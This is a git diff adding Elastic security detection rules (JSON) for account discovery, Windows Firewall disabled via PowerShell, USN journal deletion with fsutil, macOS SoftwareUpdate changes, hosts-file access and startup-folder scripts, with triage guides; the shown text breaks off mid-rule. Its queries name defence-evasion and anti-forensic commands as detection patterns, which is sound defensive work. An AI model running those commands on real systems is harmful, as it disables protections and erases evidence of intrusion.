"version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f5fb4598-4f10-11ed-bdc3-0242ac120002", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.006", + "name": "Space after Filename", + "reference": "https://attack.mitre.org/techniques/T1036/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "f5fb4598-4f10-11ed-bdc3-0242ac120002_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_3.json b/packages/security_detection_engine/kibana/security_rule/f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_3.json new file mode 100644 index 00000000000..f5fb5865f9f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_3.json @@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Adversaries may use built-in applications to get a listing of local system or domain accounts and groups.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Account or Group Discovery via Built-In Tools", + "query": "process where event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and ( \n (process.name in (\"groups\", \"id\")) or \n (process.name == \"dscl\" and process.args : (\"/Active Directory/*\", \"/Users*\", \"/Groups*\")) or\n (process.name == \"dscacheutil\" and process.args in (\"user\", \"group\")) or\n (process.args in (\"/etc/passwd\", \"/etc/master.passwd\", \"/etc/sudoers\")) or\n (process.name == \"getent\" and process.args in (\"passwd\", \"group\"))\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "f638a66d-3bbf-46b1-a52c-ef6f39fb6caf", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1069", + "name": "Permission Groups Discovery", + "reference": "https://attack.mitre.org/techniques/T1069/", + "subtechnique": [ + { + "id": "T1069.001", + "name": "Local Groups", + "reference": "https://attack.mitre.org/techniques/T1069/001/" + }, + { + "id": "T1069.002", + "name": "Domain Groups", + "reference": "https://attack.mitre.org/techniques/T1069/002/" + } + ] + }, + { + "id": "T1087", + "name": "Account Discovery", + "reference": "https://attack.mitre.org/techniques/T1087/", + "subtechnique": [ + { + "id": "T1087.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1087/001/" + }, + { + "id": "T1087.002", + "name": "Domain Account", + "reference": "https://attack.mitre.org/techniques/T1087/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_109.json b/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_109.json new file mode 100644 index 00000000000..efaeed2f944 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_109.json @@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies when the Windows Firewall is disabled using PowerShell cmdlets, which can help attackers evade network constraints, like internet and network lateral communication restrictions.", + "false_positives": [ + "Windows Firewall can be disabled by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Windows Profile being disabled by unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Firewall Disabled via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Windows Firewall Disabled via PowerShell\n\nWindows Defender Firewall is a native component that provides host-based, two-way network traffic filtering for a device and blocks unauthorized network traffic flowing into or out of the local device.\n\nAttackers can disable the Windows firewall or its rules to enable lateral movement and command and control activity.\n\nThis rule identifies patterns related to disabling the Windows firewall or its rules using the `Set-NetFirewallProfile` PowerShell cmdlet.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Check whether the user is an administrator and is legitimately performing troubleshooting.\n- In case of an allowed benign true positive (B-TP), assess adding rules to allow needed traffic and re-enable the firewall.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Re-enable the firewall with its desired configurations.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.action == \"start\" and\n (process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") or ?process.pe.original_file_name == \"PowerShell.EXE\") and\n process.args : \"*Set-NetFirewallProfile*\" and\n (process.args : \"*-Enabled*\" and process.args : \"*False*\") and\n (process.args : \"*-All*\" or process.args : (\"*Public*\", \"*Domain*\", \"*Private*\"))\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps", + "https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell", + "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php", + "http://woshub.com/manage-windows-firewall-powershell/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f63c8e3c-d396-404f-b2ea-0379d3942d73", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.004", + "name": "Disable or Modify System Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "f63c8e3c-d396-404f-b2ea-0379d3942d73_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_110.json b/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_110.json new file mode 100644 index 00000000000..a464f80f117 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_110.json @@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies when the Windows Firewall is disabled using PowerShell cmdlets, which can help attackers evade network constraints, like internet and network lateral communication restrictions.", + "false_positives": [ + "Windows Firewall can be disabled by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Windows Profile being disabled by unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Firewall Disabled via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Windows Firewall Disabled via PowerShell\n\nWindows Defender Firewall is a native component that provides host-based, two-way network traffic filtering for a device and blocks unauthorized network traffic flowing into or out of the local device.\n\nAttackers can disable the Windows firewall or its rules to enable lateral movement and command and control activity.\n\nThis rule identifies patterns related to disabling the Windows firewall or its rules using the `Set-NetFirewallProfile` PowerShell cmdlet.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Check whether the user is an administrator and is legitimately performing troubleshooting.\n- In case of an allowed benign true positive (B-TP), assess adding rules to allow needed traffic and re-enable the firewall.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Re-enable the firewall with its desired configurations.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.action == \"start\" and\n (process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") or ?process.pe.original_file_name == \"PowerShell.EXE\") and\n process.args : \"*Set-NetFirewallProfile*\" and\n (process.args : \"*-Enabled*\" and process.args : \"*False*\") and\n (process.args : \"*-All*\" or process.args : (\"*Public*\", \"*Domain*\", \"*Private*\"))\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps", + "https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell", + "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php", + "http://woshub.com/manage-windows-firewall-powershell/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f63c8e3c-d396-404f-b2ea-0379d3942d73", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.004", + "name": "Disable or Modify System Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "f63c8e3c-d396-404f-b2ea-0379d3942d73_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_109.json b/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_109.json new file mode 100644 index 00000000000..44b5a1ebf5c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_109.json @@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the fsutil.exe to delete the volume USNJRNL. This technique is used by attackers to eliminate evidence of files created during post-exploitation activities.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Delete Volume USN Journal with Fsutil", + "note": "## Triage and analysis\n\n### Investigating Delete Volume USN Journal with Fsutil\n\nThe Update Sequence Number (USN) Journal is a feature in the NTFS file system used by Microsoft Windows operating systems to keep track of changes made to files and directories on a disk volume. The journal records metadata for changes such as file creation, deletion, modification, and permission changes. It is used by the operating system for various purposes, including backup and recovery, file indexing, and file replication.\n\nThis artifact can provide valuable information in forensic analysis, such as programs executed (prefetch file operations), file modification events in suspicious directories, deleted files, etc. Attackers may delete this artifact in an attempt to cover their tracks, and this rule identifies the usage of the `fsutil.exe` utility to accomplish it.\n\nConsider using the Elastic Defend integration instead of USN Journal, as the Elastic Defend integration provides more visibility and context in the file operations it records.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Review file operation logs from Elastic Defend for suspicious activity the attacker tried to hide.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"fsutil.exe\" or ?process.pe.original_file_name == \"fsutil.exe\") and\n process.args : \"deletejournal\" and process.args : \"usn\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "f675872f-6d85-40a3-b502-c0d2ef101e92", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.004", + "name": "File Deletion", + "reference": "https://attack.mitre.org/techniques/T1070/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "f675872f-6d85-40a3-b502-c0d2ef101e92_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_106.json b/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_106.json new file mode 100644 index 00000000000..43013fdb53b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_106.json @@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies changes to the SoftwareUpdate preferences using the built-in defaults command. Adversaries may abuse this in an attempt to disable security updates.", + "false_positives": [ + "Authorized SoftwareUpdate Settings Changes" + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "SoftwareUpdate Preferences Modification", + "query": "event.category:process and host.os.type:macos and event.type:(start or process_started) and\n process.name:defaults and\n process.args:(write and \"-bool\" and (com.apple.SoftwareUpdate or /Library/Preferences/com.apple.SoftwareUpdate.plist) and not (TRUE or true))\n", + "references": [ + "https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f683dcdf-a018-4801-b066-193d4ae6c8e5", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "f683dcdf-a018-4801-b066-193d4ae6c8e5_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f75f65cf-ed04-48df-a7ff-b02a8bfe636e_3.json b/packages/security_detection_engine/kibana/security_rule/f75f65cf-ed04-48df-a7ff-b02a8bfe636e_3.json new file mode 100644 index 00000000000..110d3937bb4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f75f65cf-ed04-48df-a7ff-b02a8bfe636e_3.json @@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of built-in tools to read the contents of \\etc\\hosts on a local machine. Attackers may use this data to discover remote machines in an environment that may be used for Lateral Movement from the current system.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "System Hosts File Access", + "query": "process where event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and\nprocess.name in (\"vi\", \"nano\", \"cat\", \"more\", \"less\") and process.args == \"/etc/hosts\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "f75f65cf-ed04-48df-a7ff-b02a8bfe636e", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1018", + "name": "Remote System Discovery", + "reference": "https://attack.mitre.org/techniques/T1018/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "f75f65cf-ed04-48df-a7ff-b02a8bfe636e_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_110.json b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_110.json new file mode 100644 index 00000000000..abc44ab4ba9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_110.json @@ -0,0 +1,110 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies script engines creating files in the Startup folder, or the creation of script files in the Startup folder. Adversaries may abuse this technique to maintain persistence in an environment.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistent Scripts in the Startup Directory", + "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if 